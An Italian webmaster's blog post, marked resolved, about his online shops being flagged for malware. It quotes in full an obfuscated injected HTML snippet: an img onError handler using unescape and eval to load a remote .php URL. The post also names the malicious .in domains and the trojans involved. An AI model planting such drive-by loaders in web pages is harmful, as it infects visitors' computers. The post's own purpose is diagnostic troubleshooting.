[RISOLTO] Sito Infetto Da Malware: Dove?

In questi giorni mi sono arrivate un paio di notifiche da parte di utenti che aprendo due miei siti (negozi online per la precisione) l’antivirus scatta sull’attenti segnalando codice malevolo. Pensando che fosse qualcos’altro non ho dato molto peso, oggi però l’ho potuto vedere grazie ad uno screenshot.

C’è qualcosa che non va.. guardando sui webmaster tools di Google vedo che su un sito mi segnala una pagina contenente questo codice:

Purtroppo Google ha trovato codice dannoso sul tuo sito.

< img src=”about:blank” onError=’astro=unescape(“%27”);astru=
unescape(“%22”);sksa=eval(“document.getElementById(“+astro+”
seaid”+astro+”).src=unescape(“+astro+”%68%74%74%70%3A%2F%2F”
+astro+”)+document.getElementById(“+astro+”5550″+astro+”).id
+unescape(“+astro+”%2E%69%6E%2F”+astro+”)+”+astro+”129091371
2″+astro+”+unescape(“+astro+”%2E%70%68%70″+astro+”)”);docume
nt.getElementById(“seaid”).src=sksa’ style=”width:300;height
:300;border:0px;” >

mentre sul secondo sito mi dice che è tutto ok.

Facendo qualche ricerca trovo che questo codice è proprio la codifica di un url solitamente composto cosi xxxxx.in/xxxx.php che contiene codice malevolo e fa aprire 2 pdf infetti. Leggo inoltre che ha colpito molti blog su base wordpress.

Per caso ne hai sentito parlare?

Io nei miei due negozi online, creati con cms diversi (zen-cart e virtuemart) non riesco a trovare questo codice, inoltre ho guardato le date di ultima modifica dei file per capire se qualcuno avesse iniettato codice malevolo e non c’è niente di recente. Ho cercato veramente a fondo leggendo tutti i casi e cercando file dopo file eventuali stringhe nascoste, iframe o script, htaccess e file config,  ma niente! E’ tutto in ordine e pulito..

A me personalmente non è mai apparso niente navigandoci e comunque Google non da l’avviso di “sito che può danneggiare il tuo computer”; non so più dove guardare o cosa fare. Credo ci sia qualcosa, perchè avendo ricevuto segnalazioni diverse ho scartato l’idea di un falso positivo o di un problema sul pc con cui si naviga.

Hai qualche consiglio da darmi? esperienze simili? aiuti su dove potrebbe esserci un buco?

I due negozi hanno una versione dei cms è piuttosto datata lo so, però sono le versioni stabili con relative patch; non le ho ancora aggiornate in quanto sono gli ultimi mesi di vita, presto lasceranno il posto ad un negozio tutto nuovo.

Per il momento non mi resta che aspettare l’aggiornamento dei dati in strumenti per webmaster di Google per vedere se lo ritrova.

Ogni consiglio sarà veramente di aiuto, grazie!

P.S.: Ho un buono adwords da 75 euro in più 😀 Potrebbe essere un regalo per chi risolve il caso 😉

P.P.S.: Visitando i siti ricevete un allarme dal vostro antivirus? (se lo avete ovviamente)

UPDATE: Ancora oggi sono in alto mare.. ho potuto testarlo di persona; dopo il tad di chiusura </html> appare il codice postato sopra, richiama un file php che carica delle classi java, fa scaricare dei file pdf e fa partire il media player di windows. Un disastro insomma.

Vedo che il sito dannoso è 3737373.in o in-in.in, trattasi di Un Trojan-Downlaoder.java.openconnection.bu e un trojan Packed.Win32.Krap.ao

UPDATE RISOLUTIVO: Bene, trovata la soluzione. Il codice maligno non riuscivo a scovarlo semplicemente perchè non c’era. -.- Mi ha risposto il provider dicendo che han risolto; un sito ospitato sul mio stesso server stava infettando tutti gli altri.

Bene, anno nuovo server nuovo, passo ad un dedicato 😉

Backup del Tuo Blog e Sito in Meno di 2 Minuti con Php

Salvataggio Veloce delle Tue Pagine

Salvataggio Veloce delle Tue Pagine

Esegui regolarmente il backup dei tuoi siti, blog e il vario materiale che tieni on-line? No? Male! Ma non sei sicuramente l’unico, ci sono anche io.

Però è veramente importante salvare tutte le proprie pagine web, tutti i nostri lavori e progetti, giorno dopo giorno per evitare catastrofi di cui pentirci. E’ talmente importante quanto noioso e lento come processo.

O meglio, quando andiamo a fare un backup dei nostri databases, ci basta un dump attraverso php o uno dei tanti software disponibili, oppure con un semplice esporta da phpmyadmin, o da qualche plugins per wordpress; insomma in pochi click e pochissimo tempo possiamo salvare sul nostro pc una copia dei vari databases.

Ma per fare un backup completo di tutti i files del nostro sito/blog? Quanto tempo ci vuole?
Continua a leggere… »